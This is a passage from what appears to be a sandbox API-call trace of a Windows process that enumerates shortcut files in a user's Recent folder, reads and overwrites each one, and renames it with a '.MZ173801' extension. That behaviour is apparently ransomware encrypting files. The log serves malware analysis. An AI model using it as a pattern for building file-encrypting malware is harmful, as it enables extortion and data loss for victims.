| out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75984006, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75984006, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75985390, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3db)) returned 1 [0112.301] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.301] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0112.301] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.302] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0112.302] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Yv-akVjSVB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\yv-akvjsvb.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.302] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0112.302] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.302] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3db [0112.302] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.302] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3db, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3db, lpOverlapped=0x0) returned 1 [0112.303] CloseHandle (hObject=0x3f4) returned 1 [0112.303] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Yv-akVjSVB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\yv-akvjsvb.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.789] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3db, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3db, lpOverlapped=0x0) returned 1 [0112.790] CloseHandle (hObject=0x3f4) returned 1 [0112.791] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Yv-akVjSVB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\yv-akvjsvb.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Yv-akVjSVB.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\yv-akvjsvb.lnk.mz173801")) returned 1 [0112.801] GetCurrentThreadId () returned 0x1358 [0112.801] GetCurrentThreadId () returned 0x1358 [0112.801] GetCurrentThreadId () returned 0x1358 [0112.801] GetCurrentThreadId () returned 0x1358 [0112.801] GetCurrentThreadId () returned 0x1358 [0112.801] GetCurrentThreadId () returned 0x1358 [0112.801] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7415864f, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7415864f, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7415864f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x279, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="ZB jpmR.lnk", cAlternateFileName="ZBJPMR~1.LNK")) returned 1 [0112.801] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0112.801] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0112.801] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZB jpmR.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zb jpmr.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7415864f, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7415864f, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7415864f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x279)) returned 1 [0112.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0112.802] GetCurrentThreadId () returned 0x1358 [0112.802] GetCurrentThreadId () returned 0x1358 [0112.802] GetCurrentThreadId () returned 0x1358 [0112.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0112.803] GetCurrentThreadId () returned 0x1358 [0112.803] GetCurrentThreadId () returned 0x1358 [0112.803] GetCurrentThreadId () returned 0x1358 [0112.803] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZB jpmR.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zb jpmr.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.803] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0112.803] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.803] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x279 [0112.803] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.803] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x279, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x279, lpOverlapped=0x0) returned 1 [0112.804] CloseHandle (hObject=0x3f4) returned 1 [0112.804] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZB jpmR.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\zb jpmr.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.805] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, 